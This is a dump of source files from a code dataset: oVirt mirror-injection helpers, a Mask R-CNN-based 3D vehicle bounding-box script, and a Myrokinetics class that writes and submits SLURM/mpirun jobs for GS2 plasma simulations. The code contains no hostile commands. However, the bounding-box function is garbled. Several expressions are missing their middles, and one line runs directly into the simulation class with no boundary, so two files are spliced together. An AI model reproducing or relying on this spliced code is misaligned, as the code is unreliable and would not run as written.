relative URLs in mirrors to absolute ones\n\n :param Mapping mirrors: Mirror information map\n :param str base_uri: Base URI to add to relative URLs, usually the URI\n whee the mirrors JSON file was obtained from\n\n :rtype: dict\n :returns: The mirror information given in `mirrors` with all the relative\n URLs turned into absolute ones\n \"\"\"\n return {\n repo_name: (\n urljoin(base_uri, uri) if isinstance(uri, string_types)\n else [\n urljoin(base_uri, inc_uri) for inc_uri in uri\n ] if repo_name == 'include:'\n else [\n [ins_repo_name, urljoin(base_uri, ins_uri)]\n for ins_repo_name, ins_uri in uri\n ]\n )\n for repo_name, uri in iteritems(mirrors)\n }\n\n\ndef mirrors_to_inserts(mirrors, ins_repo_prefix, ins_type='before'):\n \"\"\"Convert mirrors map into a set of repo insertions\n\n :param Mapping mirrors: Mirrors information map\n :param str ins_repo_prefix: The prefix for names of repos that the repos\n will be inserted with relation to\n :param str ins_type: (Optional) The type of insertion to create,\n currently, only 'before' is supported\n\n :rtype: dict\n :returns: A new mirror map where the repos in `mirrors` had been converted\n to insertion requests in the following way:\n - The last part of the repo name will be treated as a distro id,\n for example, for a repo called `foo-el7` the distro id would be\n `el7`.\n - The repo will become an insertion with relation to a repo with\n the prefix given in `ins_repo_prefix` and the same distro id.\n For example, if `ins_repo_prefix` is `bar`, a repo called\n `foo-el7` would be inserted in relation to `bar-el7`.\n - Existing insertion statements in `mirrors` are generally left\n as-is, but repos could be added into them.\n - In case there are multiple insertions with relation to the same\n repo, they would be ordered alphabetically according to repo\n name\n \"\"\"\n inserts = {k: v for k, v in iteritems(mirrors) if ':' in k}\n for repo_name, repo_url in sorted(iteritems(mirrors)):\n if ':' in repo_name:\n continue\n distro = repo_name.rsplit('-', 1)[-1]\n ins_key = u'{}:{}-{}'.format(ins_type, ins_repo_prefix, distro)\n inserts.setdefault(ins_key, []).append([repo_name, repo_url])\n return inserts\n\n\ndef setupLogging(level=logging.INFO):\n \"\"\"Basic logging setup for users of this script who don't what to bother\n with it\n\n :param int level: The logging level to setup (set to consts from the\n logging module, default is INFO)\n \"\"\"\n logging.basicConfig()\n logging.getLogger().level = logging.INFO\n\n\ndef ovirt_tested_as_mirrors(\n ovirt_release,\n distributions=('el7', 'fc24', 'fc25', 'fc26'),\n repos_base='http://resources.ovirt.org/repos/ovirt/tested',\n):\n \"\"\"Generate a mirrors dict that points to the oVirt tested repos\n\n :param str ovirt_release: The oVirt release which tested repos we want\n :param Iterable distributions: (optional) the list of distributions oVirt\n is released for\n :param str repos_base: (optional) the base URL for the 'tested'\n repos\n\n The list passed to 'distributions' does not have to be accurate. The\n resulting dict is used in mirror injection (one of the inject_* functions\n above) so for a repo to be used, someone needs to ask for it by including a\n repo with the correct repo id in a yum configuration file. Therefore it is\n quite safe to include non-existent distros here, and it is also safe to\n omit some exiting distros as long as they are not asked for.\n\n :rtype: dict\n :returns: A mirrors dict that will cause the URLs for tested repos to be\n injected for repos called 'ovirt--'\n \"\"\"\n return dict(\n (\n 'ovirt-{0}-{1}'.format(ovirt_release, distribution),\n '{0}/{1}/rpm/{2}/'.format(repos_base, ovirt_release, distribution)\n ) for distribution in distributions\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/mirror_client.py","file_name":"mirror_client.py","file_ext":"py","file_size_in_byte":19595,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"41142475276","text":"import os\nimport sys\nimport random\nimport math\nimport numpy as np\nimport argparse,configparser\nimport cv2\nimport json\n\n# COCO Class names\n# Index of the class in the list is its ID. For example, to get ID of\n# the teddy bear class, use: class_names.index('teddy bear')\nclass_names = [\n 'BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',\n 'bus', 'train', 'truck', 'boat', 'traffic light',\n 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',\n 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',\n 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',\n 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',\n 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',\n 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',\n 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',\n 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',\n 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',\n 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',\n 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',\n 'teddy bear', 'hair drier', 'toothbrush']\n\ndef Cal3dBBox( boxes, masks, class_ids, scores, vp):\n N=boxes.shape[0]\n ret=[]\n if not N:\n return ret\n assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]\n\n for i in range(N):\n class_id=class_ids[i]\n if class_id not in [2,3,4,6,7,8]:\n continue\n # Bounding box\n if not np.any(boxes[i]):\n # Skip this instance. Has no bbox. Likely lost in image cropping.\n continue\n now=dict()\n now['box']=boxes[i]\n now['class_id']=class_id\n now['class_name']=class_names[class_id]\n now['score']=scores[i]\n y1, x1, y2, x2 = boxes[i]\n maskvec=[[[y-v[1],x-v[0]] for x in range(x1,x2) for y in range(y1,y2) if masks[y][x][i]] for v in vp]\n \n def CMPF(x,y):\n return math.atan2(x[1],x[0])-math.atan2(y[1],y[0])\n def CMPF1(x,y):\n return math.atan2(x[1],-x[0])-math.atan2(y[1],-y[0])\n \n def lineIntersection(a,b,c,d):\n a,b,c,d=np.array(a),np.array(b),np.array(c),np.array(d)\n denominator=np.cross(b-a,d-c)\n if abs(denominator)<1e-6:\n return False\n x=a+(b-a)*(np.cross(c-a,d-c)/denominator)\n return x\n\n from functools import cmp_to_key\n\n for j in range(2):\n maskvec[j].sort(key=cmp_to_key(CMPF))\n maskvec[2].sort(key=cmp_to_key(CMPF1))\n\n maskvec=np.array(maskvec)\n vp=np.array(vp)\n edg=[[maskvec[i][0][::-1],maskvec[i][-1][::-1]] if abs(math.atan2(maskvec[i][0][1],maskvec[i][0][0]))cross2[0]:\n cross1,cross2=cross2,cross1\n cross5=lineIntersection(vp[0], vp[0]+edg[0][0], vp[1], vp[1]+edg[1][1])\n cross6=lineIntersection(vp[0], vp[0]+edg[0][1], vp[1], vp[1]+edg[1][1])\n if cross5[0]>cross6[0]:\n cross5,cross6=cross6,cross5\n cross3=lineIntersection(vp[0], cross1, vp[2], cross5)\n cross4=lineIntersection(vp[0], cross2, vp[2], cross6)\n elif edg[1][0][0]*edg[1][-1][0]<0:\n cross1=lineIntersection(vp[0], vp[0]+edg[0][0], vp[2], vp[2]+edg[2][0])\n cross2=lineIntersection(vp[0], vp[0]+edg[0][0], vp[2], vp[2]+edg[2][1])\n if cross1[0]>cross2[0]:\n cross1,cross2=cross2,cross1\n cross5=lineIntersection(vp[1], vp[1]+edg[1][0], vp[0], vp[0]+edg[0][1])\n cross6=lineIntersection(vp[1], vp[1]+edg[1][1], vp[0], vp[0]+edg[0][1])\n if cross5[0]>cross6[0]:\n cross5,cross6=cross6,cross5\n cross3=lineIntersection(vp[1], cross1, vp[2], cross5)\n cross4=lineIntersection(vp[1], cross2, vp[2], cross6)\n else:\n cross1=lineIntersection(vp[0], vp[0]+edg[0][0], vp[1], vp[1]+edg[1][0])\n tmp1=lineIntersection(vp[0], vp[0]+edg[0][0], vp[2], vp[2]+edg[2][0])\n tmp2=lineIntersection(vp[1], vp[1]+edg[1][0], vp[2], vp[2]+edg[2][0])\n cross2=tmp1 if tmp1[1] len(self._input_files):\n\t\t\t\tn_jobs = len(self._input_files)\n\t\t\twhile n_jobs > 0:\n\t\t\t\tfor input_file in self._input_files:\n\t\t\t\t\tos.system(f\"mpirun -np 8 gs2 \\\"{input_file}\\\"\")\n\t\t\t\t\tself._input_files.remove(input_file)\n\t\t\t\t\tn_jobs -= 1\n\t\telif self['system'] == 'viking':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._ideal_input_files):\n\t\t\t\ttotal_jobs = len(self._ideal_input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._ideal_input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._ideal_input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_ideal_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"{self.inputs['sbatch']['error']}\",f\"{self.inputs['sbatch']['error']}_ideal_{n}\")\n\t\t\t\tfilename = f\"gyro_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os, sys\n\t\t\t\t\ninput_files = {input_lists[n]}\n\nif __name__ == '__main__':\n\tslurm_id = int(sys.argv[1])\n\tinput_file = input_files[slurm_id]\n\tos.system(f\"echo \\\\\\\"Input: {{input_file}}\\\\\\\"\")\n\tos.system(f\"srun --ntasks={self.inputs['sbatch']['cpus-per-task']} \\\\\\\"{{input_file}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{input_file[:-3]}}.out.nc\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{input_file[:-3]}}.fin\\\\\\\"\")\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n#SBATCH --array=0-{len(input_lists[n])}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py &\n\nwait\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/gyro_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/gyro_{n}.job\\\"\")\t\n\t\tif self['system'] == 'archer2':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par if n_par < 8 else 8\n\t\t\tif n_sim > 8:\n\t\t\t\tprint(\"Archer supports a maximum of n_sim = 8\")\n\t\t\t\tn_sim = 8\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._input_files):\n\t\t\t\ttotal_jobs = len(self._input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_{n}\")\n\t\t\t\tfilename = f\"gyro_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os\nfrom joblib import Parallel, delayed\nfrom time import sleep\n\ninput_files = {input_lists[n]}\n\ndef start_run(run):\n\tos.system(f\"echo \\\\\\\"Input: {{run}}\\\\\\\"\")\n\tos.system(f\"srun --nodes={self.inputs['sbatch']['nodes']} --ntasks={self.inputs['sbatch']['ntasks-per-node']} gs2 \\\\\\\"{{run}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{run[:-3]}}.out.nc\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{run[:-3]}}.fin\\\\\\\"\")\n\telse:\n\t\tsleep(60)\n\t\tstart_run(run)\n\nParallel(n_jobs={self.inputs['sbatch']['nodes']})(delayed(start_run)(run) for run in input_files)\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py &\n\nwait\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/gyro_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/gyro_{n}.job\\\"\")\n\t\n\tdef run_ideal_jobs(self, n_jobs = None, n_par = None, n_sim = None):\n\t\tif self['system'] in ['viking','archer2']:\n\t\t\tcompile_modules = systems[self['system']]['modules']\n\t\t\tsbatch = \"#!/bin/bash\"\n\t\t\tfor key, val in self.inputs['sbatch'].items():\n\t\t\t\tif key == 'output' and '/' not in val:\n\t\t\t\t\tval = f\"{self.inputs['data_path']}/submit_files/{val}\"\n\t\t\t\tsbatch = sbatch + f\"\\n#SBATCH --{key}={val}\"\n\t\n\t\tif self['system'] == 'ypi_server':\n\t\t\tif n_jobs is None or n_jobs > len(self._input_files):\n\t\t\t\tn_jobs = len(self._input_files)\n\t\t\twhile n_jobs > 0:\n\t\t\t\tfor input_file in self._ideal_input_files:\n\t\t\t\t\tos.system(f\"ideal_ball \\\"{input_file}\\\"\")\n\t\t\t\t\tself._ideal_input_files.remove(input_file)\n\t\t\t\t\tn_jobs -= 1\n\t\telif self['system'] == 'viking':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._ideal_input_files):\n\t\t\t\ttotal_jobs = len(self._ideal_input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._ideal_input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._ideal_input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_ideal_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"{self.inputs['sbatch']['error']}\",f\"{self.inputs['sbatch']['error']}_ideal_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"--cpus-per-task={self.inputs['sbatch']['cpus-per-task']}\",\"--cpus-per-task=1\")\n\t\t\t\tfilename = f\"ideal_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os, sys\n\t\t\t\t\ninput_files = {input_lists[n]}\n\nif __name__ == '__main__':\n\tslurm_id = int(sys.argv[1])\n\tinput_file = input_files[slurm_id]\n\tos.system(f\"echo \\\\\\\"Ideal Input: {{input_file}}\\\\\\\"\")\n\tos.system(f\"srun ideal_ball \\\\\\\"{{input_file}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{input_file[:-3]}}.ballstab2d\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{input_file[:-3]}}.fin\\\\\\\"\")\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n#SBATCH --array=0-{len(input_lists[n])}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py $SLURM_ARRAY_TASK_ID\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/ideal_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/ideal_{n}.job\\\"\")\t\n\t\tif self['system'] == 'archer2':\n\t\t\tif n_par is None:\n\t\t\t\tn_par = 1\n\t\t\tif n_sim is None:\n\t\t\t\tn_sim = n_par if n_par < 8 else 8\n\t\t\tif n_sim > 8:\n\t\t\t\tprint(\"Archer supports a maximum of n_sim = 8\")\n\t\t\t\tn_sim = 8\n\t\t\tos.makedirs(f\"{self.inputs['data_path']}/submit_files/\",exist_ok=True)\n\t\t\tinput_lists = {}\n\t\t\tfor n in range(n_par):\n\t\t\t\tinput_lists[n] = []\n\t\t\tif n_jobs == None or n_jobs*n_par > len(self._ideal_input_files):\n\t\t\t\ttotal_jobs = len(self._ideal_input_files)\n\t\t\telse:\n\t\t\t\ttotal_jobs = n_jobs*n_par\n\t\t\tinput_list = list(self._ideal_input_files)\n\t\t\tfor i in range(total_jobs):\n\t\t\t\tinput_lists[i%n_par].append(input_list[i])\n\t\t\t\tself._ideal_input_files.remove(input_list[i])\n\t\t\tfor n in range(n_par):\n\t\t\t\tsbatch_n = sbatch.replace(f\"{self.inputs['sbatch']['output']}\",f\"{self.inputs['sbatch']['output']}_ideal_{n}\")\n\t\t\t\tsbatch_n = sbatch_n.replace(f\"#SBATCH --nodes = {self.inputs['sbatch']['nodes']}\",\"#SBATCH --nodes = 1\")\n\t\t\t\tfilename = f\"ideal_{n}\"\n\t\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/{filename}.py\",'w')\n\t\t\t\tpyth.write(f\"\"\"import os\nfrom joblib import Parallel, delayed\nfrom time import sleep\n\ninput_files = {input_lists[n]}\n\ndef start_run(run):\n\tos.system(f\"echo \\\\\\\"Ideal Input: {{run}}\\\\\\\"\")\n\tos.system(f\"srun --nodes=1 --ntasks=1 ideal_ball \\\\\\\"{{run}}\\\\\\\"\")\n\tif os.path.exists(f\\\"{{run[:-3]}}.ballstab_2d\\\"):\n\t\tos.system(f\"touch \\\\\\\"{{run[:-3]}}.fin\\\\\\\"\")\n\telse:\n\t\tsleep(60)\n\t\tstart_run(run)\n\nParallel(n_jobs={self.inputs['sbatch']['ntasks-per-node']})(delayed(start_run)(run) for run in input_files)\"\"\")\n\t\t\t\tpyth.close()\n\t\t\t\tjobfile = open(f\"{self.inputs['data_path']}/submit_files/{filename}.job\",'w')\n\t\t\t\tjobfile.write(f\"\"\"{sbatch_n}\n\n{compile_modules}\n\nwhich gs2\ngs2 --build-config\n\npython {self.inputs['data_path']}/submit_files/{filename}.py &\n\nwait\"\"\")\n\t\t\t\tif n_par > n_sim and n + n_sim < n_par:\n\t\t\t\t\tjobfile.write(f\"\\nsbatch {self.inputs['data_path']}/submit_files/ideal_{n+n_sim}.job\")\n\t\t\t\tjobfile.close()\n\t\t\tfor n in range(n_sim):\n\t\t\t\tos.system(f\"sbatch \\\"{self.inputs['data_path']}/submit_files/ideal_{n}.job\\\"\")\n\t\n\tdef make_ideal_files(self, directory = None, specificRuns = None, checkSetup = True):\n\t\tif checkSetup:\n\t\t\tif not self.check_setup():\n\t\t\t\treturn\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\tif specificRuns:\n\t\t\truns = specificRuns\n\t\telse:\n\t\t\tcheck = self.check_complete(directory = directory, doPrint = False, gyro = False, ideal = True)\n\t\t\tif check['ideal_complete']:\n\t\t\t\tprint(f\"{len(check['ideal_complete'])} Existing Ideal Runs Detected\")\n\t\t\truns = check['ideal_incomplete']\n\t\t\t\n\t\tfor run in runs:\n\t\t\tsub_dir = self.get_ideal_run_directory(run)\n\t\t\tos.makedirs(sub_dir,exist_ok=True)\n\t\t\t\n\t\t\texisting_inputs = [] \n\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=-1) + 1\n\t\t\tfilename = f\"itteration_{itt}\"\n\t\t\t\n\t\t\tnml = self.eqbm.get_surface_input(psiN = run['psin'])\n\t\t\tnml['ballstab_knobs']['theta0'] = run['theta0']\n\t\t\tnml.write(f\"{sub_dir}/{filename}.in\", force=True)\n\t\t\tself._ideal_input_files.add(f\"{sub_dir}/{filename}.in\")\n\t\n\tdef get_all_runs(self):\n\t\tdef loop(n,variables={},runs=[]):\n\t\t\tif n == 0:\n\t\t\t\treturn [{}]\n\t\t\tdim = self.dimensions[self.inputs.dim_order[len(self.dimensions)-n]]\n\t\t\tfor val in dim.values:\n\t\t\t\tvariables[dim.name] = val\n\t\t\t\tif n>1:\n\t\t\t\t\tloop(n=n-1,variables=variables)\n\t\t\t\telse:\n\t\t\t\t\truns.append(variables.copy())\n\t\t\tif n == len(self.dimensions):\n\t\t\t\treturn runs\n\t\treturn loop(n=len(self.dimensions))\n\t\n\tdef get_all_ideal_runs(self):\n\t\truns = []\n\t\tif 'theta0' in self.dimensions:\n\t\t\ttheta0s = self.dimensions['theta0'].values\n\t\telif 'theta0' in self.single_parameters:\n\t\t\ttheta0s = self.single_parameters['theta0'].values\n\t\telse:\n\t\t\ttheta0s = [0]\n\t\t\n\t\tif 'psin' in self.dimensions:\n\t\t\tpsins = self.dimensions['psin'].values\n\t\telse:\n\t\t\tpsins = self.single_parameters['psin'].values\n\t\t\n\t\tfor psiN in psins:\n\t\t\tfor theta0 in theta0s:\n\t\t\t\truns.append({'psin': psiN, 'theta0': theta0})\n\t\treturn runs\n\t\t\t\t\n\tdef make_gyro_files(self, directory = None, checkSetup = True, specificRuns = None, group_runs = None):\n\t\tif checkSetup:\n\t\t\tif not self.check_setup():\n\t\t\t\treturn\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\tif not specificRuns:\n\t\t\tcheck = self.check_complete(directory = directory, doPrint = False, gyro = True, ideal = False)\n\t\t\tif check['gyro_complete']:\n\t\t\t\tprint(f\"{len(check['gyro_complete'])} Existing Gyro Runs Detected\")\n\t\t\truns = check['gyro_incomplete']\n\t\telse:\n\t\t\truns = specificRuns\n\t\t\n\t\t\n\t\t\t\n\t\tfor run in runs:\n\t\t\tsub_dir = self.get_run_directory(run)\n\t\t\tos.makedirs(sub_dir,exist_ok=True)\n\t\t\texisting_inputs = [] \n\t\t\tfor f in glob.glob(r'itteration_*.in'):\n\t\t\t\texisting_inputs.append([x for x in f if x.isdigit()])\n\t\t\titt = max([eval(\"\".join(x)) for x in existing_inputs],default=-1)\n\t\t\tif itt < self.inputs['itteration']:\n\t\t\t\tfilename = f\"itteration_{self.inputs['itteration']}\"\n\t\t\t\tsubnml = self.eqbm.get_gyro_input(run = run)\n\t\t\t\tsubnml.write(f\"{sub_dir}/{filename}.in\", force=True)\n\t\t\telse:\n\t\t\t\tfilename = f\"itteration_{itt}\"\n\t\t\t\t\n\t\t\tself._input_files.add(f\"{sub_dir}/{filename}.in\")\n\t\n\tdef get_run_directory(self, run):\n\t\tsub_dir = f\"{self.inputs['data_path']}/gyro_files/\" + \"/\".join([f\"{name} = {run[name]:.4g}\" for name in self.inputs.dim_order])\n\t\treturn sub_dir\n\t\n\tdef get_ideal_run_directory(self, run):\n\t\tif 'psin' not in run and 'psin' not in self.single_parameters:\n\t\t\tprint(\"ERROR: psin not given\")\n\t\t\treturn None\n\t\telif 'psin' not in run and 'psin' in self.single_parameters:\n\t\t\trun['psin'] = self.single_parameters['psin'].values[0]\n\t\tif 'theta0' not in run and 'theta0' not in self.single_parameters and 'theta0' not in self.dimensions:\n\t\t\trun['theta0'] = 0\n\t\telif 'theta0' not in run and 'theta0' in self.single_parameters:\n\t\t\trun['theta0'] = self.single_parameters['theta0'].values[0]\n\t\telif 'theta0' not in run and 'theta0' in self.dimensions:\n\t\t\tprint(\"ERROR: theta0 not given\")\n\t\t\treturn None\n\t\t\n\t\tsub_dir = f\"{self.inputs['data_path']}/ideal_files/\" + \"/\".join([f\"{name} = {run[name]:.4g}\" for name in ['psin','theta0']])\n\t\treturn sub_dir\n\t\n\tdef update_itteration(self):\n\t\tself.inputs['info']['itteration'] = self.inputs['itteration'] + 1\n\t\tprint(f\"Updated to itteration {self.inputs['itteration']}\")\n\t\n\tdef create_run_info(self):\n\t\tself.inputs.create_run_info()\n\t\n\tdef check_complete(self, directory = None, doPrint = True, ideal = None, gyro = None):\n\t\tif self.inputs['data_path'] is None:\n\t\t\tself.inputs.create_run_info()\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\t\t\n\t\tif gyro is None:\n\t\t\tgyro = self['gyro']\n\t\telif type(gyro) != bool:\t\n\t\t\tprint(\"ERROR: gyro must be boolean\")\n\t\t\treturn\n\t\tif ideal is None:\n\t\t\tideal = self['ideal']\n\t\telif type(ideal) != bool:\n\t\t\tprint(\"ERROR: ideal must be boolean\")\n\t\t\treturn\n\t\t\n\t\tunfinished_gyro = []\n\t\tfinished_gyro = []\n\t\tif gyro:\n\t\t\tfor run in self.get_all_runs():\n\t\t\t\tsub_dir = self.get_run_directory(run)\n\t\t\t\tif self['system'] != 'archer2' and os.path.exists(f\"{sub_dir}/itteration_0.out.nc\"):\n\t\t\t\t\tfinished_gyro.append(run)\n\t\t\t\telif self['system'] == 'archer2' and os.path.exists(f\"{sub_dir}/itteration_0.fin\"):\n\t\t\t\t\tfinished_gyro.append(run)\n\t\t\t\telse:\n\t\t\t\t\tunfinished_gyro.append(run)\n\n\t\tunfinished_ideal = []\n\t\tfinished_ideal = []\n\t\tif ideal:\n\t\t\tfor run in self.get_all_ideal_runs():\n\t\t\t\tsub_dir = self.get_ideal_run_directory(run)\n\t\t\t\tif os.path.exists(f\"{sub_dir}/itteration_0.fin\"):\n\t\t\t\t\tfinished_ideal.append(run)\n\t\t\t\telse:\n\t\t\t\t\tunfinished_ideal.append(run)\n\t\t\n\t\tif doPrint:\n\t\t\tprint(f\"Gyro Runs Complete: {len(finished_gyro)} | Incomplete : {len(unfinished_gyro)}\")\n\t\t\tprint(f\"Ideal Runs Complete: {len(finished_ideal)} | Incomplete : {len(unfinished_ideal)}\")\n\t\t\treturn\n\t\telse:\n\t\t\treturn {'gyro_complete': finished_gyro, 'gyro_incomplete': unfinished_gyro, 'ideal_complete': finished_ideal, 'ideal_incomplete': unfinished_ideal}\n\t\n\tdef _save_obj(self, filename = None, directory = None):\n\t\tif filename is None:\n\t\t\tfilename = \"scan.obj\"\n\t\tif directory is None:\n\t\t\tdirectory = self.path\n\t\timport pickle\n\t\ttemp = self.eqbm.pyro\n\t\tself.eqbm.pyro = None\n\t\twith open(filename,'wb') as obj:\n\t\t\tpickle.dump(self,obj)\n\t\tself.eqbm.pyro = temp\n\n\tdef _save_nml_diff(self, filename = None, directory = None):\n\t\tif filename is None:\n\t\t\tfilename = \"nml_diffs\"\n\t\tif directory is None:\n\t\t\tdirectory = self.inputs['data_path']\n\t\tsavez(f\"{directory}/{filename}\", name_diffs = self.namelist_diffs)\n\t\n\tdef quick_save(self, filename = None, directory = None, SlurmSave = False):\n\t\tself.save_out(filename = filename, directory = directory, SlurmSave = SlurmSave, QuickSave = True)\n\tdef save_out(self, filename = None, directory = None, SlurmSave = False, QuickSave = False):\n\t\tif filename is None and self.inputs['run_name'] is None:\n\t\t\tfilename = input(\"Output File Name: \")\n\t\t\tfilename = filename.split(\".\")[0]\n\t\telif filename is None:\n\t\t\tfilename = self.inputs['run_name']\n\t\t\t\n\t\tif self.inputs['data_path'] is None:\n\t\t\tself.inputs.create_run_info()\n\t\tif directory is None:\n\t\t\tdirectory = self.path\n\t\t\n\t\tif not self['gyro'] and not self['ideal']:\n\t\t\tprint(\"Error: Both Gyro and Ideal are False\")\n\t\t\treturn\n\t\t\n\t\tif self['system'] in ['viking','archer2'] and not SlurmSave:\n\t\t\tsave_modules = systems[self['system']]['save_modules']\n\t\t\tself._save_nml_diff()\n\t\t\tsbatch = \"#!/bin/bash\"\n\t\t\tfor key, val in self.inputs['sbatch_save'].items():\n\t\t\t\tif key == 'output' and '/' not in val:\n\t\t\t\t\tval = f\"{self.inputs['data_path']}/submit_files/{val}\"\n\t\t\t\tsbatch = sbatch + f\"\\n#SBATCH --{key}={val}\"\n\t\t\tjob = open(f\"{self.inputs['data_path']}/submit_files/save_out.job\",'w')\n\t\t\tjob.write(f\"\"\"{sbatch}\n\n{save_modules}\n\npython {self.inputs['data_path']}/submit_files/save_out.py\"\"\")\n\t\t\tjob.close()\n\t\t\tpyth = open(f\"{self.inputs['data_path']}/submit_files/save_out.py\",'w')\n\t\t\tpyth.write(f\"\"\"from Myrokinetics import myro_scan\nfrom numpy import load\nwith load(\\\"{self.inputs['data_path']}/nml_diffs.npz\\\",allow_pickle = True) as obj:\n\tnd = obj['name_diffs']\n\trun = myro_scan(input_file = \\\"{self.inputs.input_name}\\\", directory = 